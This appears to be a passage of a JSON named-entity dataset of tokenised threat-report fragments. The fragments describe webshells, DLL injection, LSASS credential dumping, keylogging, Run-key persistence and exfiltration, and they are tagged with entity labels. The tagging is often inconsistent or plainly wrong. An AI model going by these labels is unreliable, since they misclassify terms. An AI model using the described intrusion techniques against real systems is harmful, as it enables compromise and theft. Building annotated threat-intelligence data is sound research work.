"B-SamFile", "O", "O", "O" ] }, { "tokens": [ "following", "base64", "decoded", "header" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "showing", "the", "decrypted", "botpack", "structure." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "that", "makes", "the", "HTTP", "request." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "sends", "an", "HTTP", "request", "that", "will", "contain", "the", "encrypted", "bot", "response." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "contain", "the", "host", "information" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "Base-64", "encoded", "segment" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "may", "also", "deliver", "a", "weaponized", "Office", "document", "that", "executes", "the", "ReconShark", "reconnaissance", "malware." ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "to", "distribute", "password-protected", "weaponized", "Office", "documents" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Office", "documents", "weaponized" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "hardware", "information." ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "to", "use", "this", "tool", "for", "remote", "management", "of", "its", "infrastructure." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "webshells,", "mostly", "obfuscated," ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "hacker", "also", "changes", "the", "content", "of", "the", "file", "RedirSuiteServiceProxy.aspx", "to", "webshell", "content." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "RedirSuiteServiceProxy.aspx", "is", "a", "legitimate", "file", "name", "available", "in", "the", "Exchange", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "attacker", "downloads", "files," ], "ner_tags": [ "O", "B-HackOrg", "O", "O" ] }, { "tokens": [ "drops", "suspicious", "files", "on", "the", "attacked", "servers" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "collecting", "information", "on", "the", "system," ], "ner_tags": [ "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "“cmd”", "/c" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/c" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "the", "standard", "Windows", "command", "line", "tool", "cmd.exe." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Delete", "file", "or", "folder" ], "ner_tags": [ "B-SamFile", "I-SamFile", "O", "O" ] }, { "tokens": [ "the", "hacker", "also", "injects", "malicious", "DLLs", "into", "the", "memory," ], "ner_tags": [ "O", "B-Idus", "O", "B-Way", "B-Way", "B-Way", "O", "O", "O" ] }, { "tokens": [ "the", "DLL", "was", "injected", "into", "the", "memory", "of", "the", "svchost.exe", "process" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "executes", "these", "files", "through", "WMIC." ], "ner_tags": [ "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ ",", "the", "above", "files", "no", "longer", "exist", "on", "the", "compromised", "system,", "possibly", "due", "to", "the", "hacker’s", "evidence", "deletion." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Decrypt", "the", "request", "received", "using", "AES", "algorithm" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "After", "decoding," ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "creates", "a", "listener", "that", "listens", "for", "connections", "to", "port", "443", "at", "the", "path", "https://*:" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "This", "method", "is", "responsible", "for", "collecting", "system", "information" ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features" ] }, { "tokens": [ "Information", "such", "as", "operating", "system", "architecture,", "framework", "version,", "operating", "system", "version,", "etc." ], "ner_tags": [ "O", "O", "O", "O", "I-Features", "O", "I-Features", "O", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "listing", "directory", "and", "file", "information", "in", "the", "format", "D|-|<Date", "created>", "|<Date", "modified>", "|<folder", "or", "file", "name>" ], "ner_tags": [ "O", "B-Features", "O", "O", "B-Features", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "reading", "files" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Sending", "and", "receiving", "data", "with", "C2", "using", "the", "RC4", "encryption", "algorithm", "where", "the", "key", "will", "be", "generated", "at", "runtime." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "delivered", "via", "phishing", "email", "as", "an", "attachment" ], "ner_tags": [ "O", "O", "B-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "The", "archives", "often", "include", "a", "JavaScript", "(.js)", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O" ] }, { "tokens": [ "likely", "exploited", "known", "vulnerabilities", "in", "unpatched", "applications", "for", "initial", "access" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "gains", "access", "to", "the", "targets", "through", "remote", "exploitation", "of", "an", "unpatched", "internet-facing", "device." ], "ner_tags": [ "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "perform", "initial", "intrusion", "leveraging", "exposed", "vulnerable", "applications,", "for", "example,", "continuing", "to", "exploit", "Log4j", "2", "vulnerabilities", "in", "unpatched", "systems", "in" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-Exp", "O", "O", "O", "O" ] }, { "tokens": [ "Installing", "legitimate", "remote", "access", "tools,", "such", "as", "RPort,", "Ligolo", "and", "eHorus" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "common", "native", "Windows", "tools", "and", "commands", "such", "as", "netstat" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Windows", "Management", "Instrumentation", "(WMI)", "to", "launch", "commands", "on", "devices" ], "ner_tags": [ "O", "O", "B-SecTeam", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Remote", "scheduled", "tasks", "to", "launch", "their", "customized", "PowerShell", "backdoor" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool" ] }, { "tokens": [ "to", "register", "a", "scheduled", "task", "used", "to", "launch", "the", "ransomware", "payload." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actors", "consistently", "perform", "extensive", "lateral", "movement", "actions", "using", "the", "acquired", "credentials", "within", "a", "targeted", "environment." ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GPO", "was", "leveraged", "again", "to", "register", "a", "scheduled", "task", "used", "to", "launch", "the", "ransomware", "payload." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "first", "interfered", "with", "security", "tools", "using", "Group", "Policy", "Objects", "(GPO)." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O" ] }, { "tokens": [ "the", "threat", "actors", "leveraged", "highly", "privileged", "credentials", "and", "access", "to", "domain", "controllers" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actors", "used", "the", "compromised", "administrator", "account" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actors", "had", "to", "first", "compromise", "two", "privileged", "accounts", "and", "leverage", "them", "to", "manipulate", "the", "Azure", "Active", "Directory", "(Azure", "AD)", "Connect", "agent." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actors", "first", "used", "a", "compromised,", "highly", "privileged", "account", "to", "access", "the", "device", "where", "the", "Azure", "Active", "Directory", "(Azure", "AD)", "Connect", "agent", "is", "installed." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "first", "account", "was", "the", "compromised", "Azure", "AD", "Connector", "account," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actors", "were", "observed", "using", "compromised", "credentials", "to", "access", "the", "Azure", "AD", "Connect", "device." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "authentication", "from", "a", "known", "attacker", "IP", "address", "into", "the", "Azure", "AD", "Connector", "cloud", "account." ], "ner_tags": [ "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actors", "executed", "multiple", "actions", "in", "the", "cloud", "using", "two", "privileged", "accounts." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "The", "Azure", "AD", "Connector", "account", "and", "the", "compromised", "administrator", "account", "were", "then", "used", "to", "perform" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Tool", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "successful", "sign-in", "to", "the", "Microsoft", "Azure", "environment", "was", "observed." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actors", "then", "used", "these", "credentials", "to", "pivot", "from", "the", "on-premises", "environment", "to", "the", "Azure", "AD", "environment." ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O" ] }, { "tokens": [ "the", "threat", "actors", "leveraged", "RDP", "for", "access", "into", "the", "account." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actors", "accessed", "it", "through", "RDP,", "which", "is", "an", "open", "session", "that", "evades", "MFA", "blocking", "their", "activities." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-OffAct" ] }, { "tokens": [ "Those", "files", "will", "still", "get", "executed,", "if", "the", "user", "clicks", "on", "run" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Full", "path", "to", "file", "and", "hidden", "files" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "As", "LSASS", "dumps", "are", "nowadays", "recognized", "by", "the", "dump", "file", "itself" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "LSASS", "dump", "in", "c:\\tmp", "detected", "and", "deleted" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LSASS", "dump", "in", "the", "WebDAV", "detected" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "done", "via", "the", "GetAsyncKeyState", "API," ], "ner_tags": [ "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "this", "is", "done", "via", "the", "popen", "API" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "uses", "Windows", "API", "functions", "to", "execute", "files" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "is", "done", "via", "the", "GetAsyncKeyState", "API,", "with", "keystrokes", "being", "logged" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "keylogging", "are", "enabled", "by", "default," ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "logs", "keystrokes", "for", "windows", "with", "titles", "containing", "substrings", "specified", "in", "its", "configuration" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Window", "titles", "to", "keylog" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "can", "log", "keystrokes." ], "ner_tags": [ "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Screenshots", "are", "also", "taken", "at", "a", "configurable", "interval;", "the", "default", "is", "once", "every", "30", "seconds." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Screenshots", "and", "keylogging", "are", "enabled", "by", "default," ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "can", "capture", "screenshots" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "shellcode", "is", "stored", "in", "files", "instead", "of", "the", "registry,", "and", "the", "stored", "shellcode", "is", "loaded", "and", "executed", "on", "Dolphin’s", "startup" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O" ] }, { "tokens": [ "The", "backdoor", "periodically", "checks", "and", "creates", "its", "own", "persistence", "by", "making", "sure", "that", "Step", "1", "of", "the", "loader", "is", "run", "every", "time", "the", "system", "is", "started,", "via", "a", "registry", "Run", "value,", "in", "the", "same", "way", "as", "in", "the", "installer:", "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\<random_run_name>\\”%appdata%\\Python27({32|64})\\pythonw.exe”", "“<loader_step_1>”", "“<loader_encrypted_step_2>”" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "uses", "Run", "keys", "for", "persistence", "of", "its", "loader" ], "ner_tags": [ "O", "B-Tool", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "can", "execute", "shell", "commands" ], "ner_tags": [ "O", "B-Features", "O", "O" ] }, { "tokens": [ "creates", "directory", "listings" ], "ner_tags": [ "I-Features", "I-Features", "O" ] }, { "tokens": [ "The", "command", "to", "get", "specific", "files" ], "ner_tags": [ "O", "O", "O", "I-Features", "I-Features", "I-Features" ] }, { "tokens": [ "It", "creates", "directory", "listings" ], "ner_tags": [ "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "to", "get", "files", "from", "drives" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "it", "searches", "the", "drives", "of", "compromised", "systems", "for", "interesting", "files" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "can", "obtain", "file", "and", "directory", "listings." ], "ner_tags": [ "O", "O", "B-Features", "O", "O", "B-HackOrg" ] }, { "tokens": [ "The", "following", "file", "extensions", "of", "interest,", "specific", "to", "media,", "documents,", "emails,", "and", "certificates," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "B-Way", "O", "O" ] }, { "tokens": [ "can", "collect", "files", "from", "local", "drives." ], "ner_tags": [ "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Username" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "obtains", "the", "victim’s", "username." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Computer", "name" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "RAM", "size", "and", "usage" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "OS", "version" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "obtains", "various", "system", "information", "including", "OS", "version,", "computer", "name", "and", "RAM", "size." ], "ner_tags": [ "B-Features", "I-Features", "I-Features", "I-Features", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "List", "of", "installed", "security", "products" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "obtains", "a", "list", "of", "installed", "security", "software." ], "ner_tags": [ "B-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Local", "and", "external", "IP", "address" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "obtains", "the", "device’s", "local", "and", "external", "IP", "address." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XOR-decrypts", "an", "embedded", "PE", "file" ], "ner_tags": [ "O", "O", "O", "B-Way", "B-SamFile" ] }, { "tokens": [ "XOR-decrypts", "further", "shellcode", "carried", "within", "itself," ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XOR-decrypts", "its", "contents," ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "a", "decrypted", "configuration" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "injects", "it", "into", "the", "created", "process" ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "in", "a", "specified", "separate", "process", "that", "is", "created", "and", "injected." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "and", "inject", "processes." ], "ner_tags": [ "O", "B-Way", "B-Features" ] }, { "tokens": [ "it", "creates", "a", "one-time", "scheduled", "task." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "uses", "a", "temporary", "scheduled", "task", "to", "start", "after", "installation." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "After", "execution,", "the", "output", "of", "commands", "is", "uploaded." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "exfiltrates", "data", "to", "Google", "Drive", "storage" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "it", "searches", "the", "drives", "of", "compromised", "systems", "for", "interesting", "files", "and", "exfiltrates", "them", "to", "Google", "Drive." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "exfiltrates", "data", "to", "Google", "Drive." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "shellcode", "is", "stored", "in", "the", "registry," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "sending", "an", "HTTP", "POST", "request" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "uses", "HTTPS", "to", "communicate", "with", "Google", "Drive." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "staging", "the", "data", "in", "encrypted", "ZIP", "archives", "before", "upload." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "stages", "collected", "data", "in", "a", "directory", "before", "exfiltration" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "content", "is", "encrypted", "using", "AES", "CBC", "with", "random", "16-byte", "keys", "and", "IVs," ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Most", "strings", "in", "this", "version", "are", "base64", "encoded." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "base64-encoded", "strings", "were", "plaintext", "again", "in", "this", "version." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "has", "encrypted", "components." ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "another", "shellcode,", "XOR-decrypts", "an", "embedded", "PE", "file", "–", "the", "Dolphin", "backdoor", "–", "and", "loads", "and", "executes", "it", "using", "a", "custom", "PE", "loader." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "which", "is", "vulnerable", "to", "a", "DLL", "side-loading", "vulnerability,", "and", "loads", "a", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O" ] }, { "tokens": [ "sideloading", "different", "DLL", "names,", "and", "multiple", "binary", "files", "names", "being", "loaded", "by", "those", "DLLs." ], "ner_tags": [ "B-Features", "O", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "executables", "and", "sideloaded", "files" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Side-loaded", "DLL", "name" ], "ner_tags": [ "B-SamFile", "O", "O" ] }, { "tokens": [ "a", "threat", "actor", "abusing", "a", "sideloading", "vulnerability" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Name", "of", "the", "malicious", "side-loaded", "DLL" ], "ner_tags": [ "O", "O", "O", "O", "B-SecTeam", "O" ] }, { "tokens": [ "Name", "of", "the", "executable", "vulnerable", "to", "side", "loading" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "seemingly", "legitimate", "executables", "and", "their", "respective", "sideloaded", "files" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "encoded", "shellcode" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Creates", "a", "memory", "section", "with", "the", "DES-encrypted", "malware", "configuration" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "obfuscate", "their", "malware." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "used", "VMProtect", "to", "obfuscate", "one", "of", "them." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "that", "decompresses", "and", "loads", "the", "first", "stage", "in", "memory." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "shellcode", "decompressing", "and", "loading" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "there", "was", "only", "one", "stage", "being", "decrypted", "in", "memory" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "malware", "decrypts", "the", "saved", "passwords" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "and", "then", "decrypts", "them" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "and", "then", "decrypts", "the", "content" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "calls", "Stage", "1", "again", "via", "process", "hollowing", "with", "four", "parameters" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "It", "then", "runs", "Stage", "2", "via", "process", "hollowing." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "creates", "a", "registry", "key" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "a", "service", "that", "launches", "the", "moved", "executable", "rc.exe", "with", "one", "parameter." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Screenshot", "grab" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Drive", "information", "retrieval" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "browses", "a", "directory" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Process", "manager", "(browses", "and", "terminates", "processes)" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Current", "process", "ID" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "deletes," ], "ner_tags": [ "O" ] }, { "tokens": [ "uploads,", "downloads", "a", "file" ], "ner_tags": [ "B-Features", "O", "B-Features", "O" ] }, { "tokens": [ "Command", "execution" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "by", "calling", "the", "GetNetworkParams", "API", "function" ], "ner_tags": [ "O", "O", "O", "B-Way", "B-Tool", "O" ] }, { "tokens": [ "Collected", "machine", "information", "includes", "the", "following:", "Randomly", "generated", "GUID", "Hostname" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Processor", "architecture" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Operating", "system", "version" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Username" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "Local", "IP", "address", "and", "port", "used", "to", "send", "the", "network", "packet" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "The", "configuration", "is", "encrypted", "with", "a", "hardcoded", "DES", "key", "and", "is", "a", "few", "bytes", "long" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "malware", "retrieves", "information", "on", "the", "infected", "machine", "and", "sends", "it", "to", "the", "C&C", "encrypted", "with", "DES." ], "ner_tags": [ "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "information", "is", "sent", "to", "the", "C&C,", "encrypted", "with", "a", "hardcoded", "key", "and", "DES", "CBC", "algorithm:" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "malware", "retrieves", "information", "on", "the", "infected", "machine", "and", "sends", "it", "to", "the", "C&C" ], "ner_tags": [ "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Then,", "the", "malware", "retrieves", "information", "on", "the", "compromised", "computer", "and", "sends", "it", "to", "the", "C&C." ], "ner_tags": [ "O", "O", "B-SamFile", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "used", "as", "a", "lure", "to", "entice", "the", "victim", "into", "opening", "the", "malicious", "file." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "to", "extract", "the", "URL,", "login,", "and", "password", "fields", "from", "the", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Name", "of", "the", "hardcoded", "directory", "where", "files", "are", "copied" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "malware", "also", "established", "persistence", "on", "the", "host", "with", "the", "creation", "of", "a", "registry", "run", "key." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "persistence", "was", "achieved", "by", "creating", "a", "‘Run’", "key" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "These", "files", "were", "transferred", "to", "the", "domain", "controller", "over", "SMB." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "dumped", "lsass", "memory", "on", "the", "domain", "controller." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "We", "observed", "a", "process", "created", "by", "Cobalt", "Strike", "accessing", "lsass.exe" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Way" ] }, { "tokens": [ "is", "a", "known", "indicator", "of", "such", "tools", "as", "Mimikatz" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "most", "likely", "using", "credentials", "gathered", "by", "the", "previous", "LSASS", "access." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "then", "proceeded", "to", "access", "lsass", "memory", "on", "the", "host", "to", "extract", "credentials." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "the", "threat", "actor", "became", "active", "by", "initiating", "a", "proxied", "RDP", "connection", "via", "the", "Cobalt", "Strike", "beacon", "to", "the", "domain", "controller." ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", 